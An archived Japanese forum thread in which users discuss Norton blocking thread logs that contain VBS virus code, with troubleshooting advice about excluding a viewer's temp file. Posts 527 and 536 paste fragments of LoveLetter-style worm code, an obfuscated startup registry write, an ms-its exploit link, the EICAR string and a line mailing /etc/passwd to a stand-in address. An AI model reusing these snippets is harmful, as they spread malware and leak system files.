ノートンがvbsウィルスのソースに誤反応３

[過去ﾛｸﾞ] ノートンがvbsウィルスのソースに誤反応３ (1002ﾚｽ)
上下前次 1-新

このｽﾚｯﾄﾞは過去ﾛｸﾞ倉庫に格納されています｡
次ｽﾚ検索歴削→次ｽﾚ栞削→次ｽﾚ過去ﾛｸﾞﾒﾆｭｰ

525(1): 2006/04/15(土)23:21 ID:??? AAS
>>524
誤反応

526: 2006/04/16(日)09:18 ID:??? AAS
>>524
ログ除外以外にもやる事がある
>>1から読め

527: 2006/04/17(月)20:53 ID:Se29R1qE(1) AAS
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部ﾘﾝｸ[htm]:www.loadcash.biz" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) 　　
ms-its:mhtml:file://c:\　
省3

528(1): 2006/04/24(月)17:37 ID:2zoSjqC7(1) AAS
にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。

エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。

529(2): 2006/04/24(月)20:13 ID:??? AAS
ふーん

530(1): 2006/04/30(日)18:51 ID:??? AAS
>NIS2005の場合(多分NIS2006も同じ)

同じではない件に付いて

531: ぴーこ名無しさん [・・・ ascii/1143450751/551 sage] 2006/05/01(月)23:31 ID:??? AAS
>>530
kwsk

532: ぴーこ名無しさん 2006/05/01(月)23:32 ID:??? AAS
目欄が・・・orz...........

533: 2006/05/04(木)23:17 ID:Gcx9i+9f(1) AAS
>>524と同じ症状です。
ここ１週間から出てる。

534: 2006/05/13(土)05:26 ID:w+9rO7hg(1) AAS
AA省

535: 2006/05/13(土)09:57 ID:??? AAS
AA省

536(1): 2006/05/15(月)14:24 ID:??? AAS
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

537: [age] 2006/05/19(金)20:06 ID:??? AAS
保守age

538(5): 2006/05/24(水)01:38 ID:uOt5d8a9(1/4) AAS
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか？

539: 2006/05/24(水)01:40 ID:??? AAS
AA省

540(3): ぴーこ名無しさん 2006/05/24(水)02:15 ID:??? AAS
>>538
2chｽﾚ:software
ログフォルダの指定を今一度確認してください。

以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
外部ﾘﾝｸ:service1.symantec.com
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」の右側に表示されているボタン、[レポートの表示] をクリックする。

541(1): 538 2006/05/24(水)02:24 ID:??? AAS
>>540
グミクズがさっさと教えろや

542(1): 538 2006/05/24(水)03:34 ID:uOt5d8a9(2/4) AAS
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね？
それとも止めといたほうがいいですか？（このファイルを削除しても意味無しですよね）
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね

543(2): 538 2006/05/24(水)03:39 ID:uOt5d8a9(3/4) AAS
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。

544(1): ぴーこ名無しさん 2006/05/24(水)04:07 ID:??? AAS
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。

注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。

上下前次 1-新書関写板覧索設栞歴

あと 458 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ AAｻﾑﾈｲﾙ

ぬこの手ぬこTOP 0.011s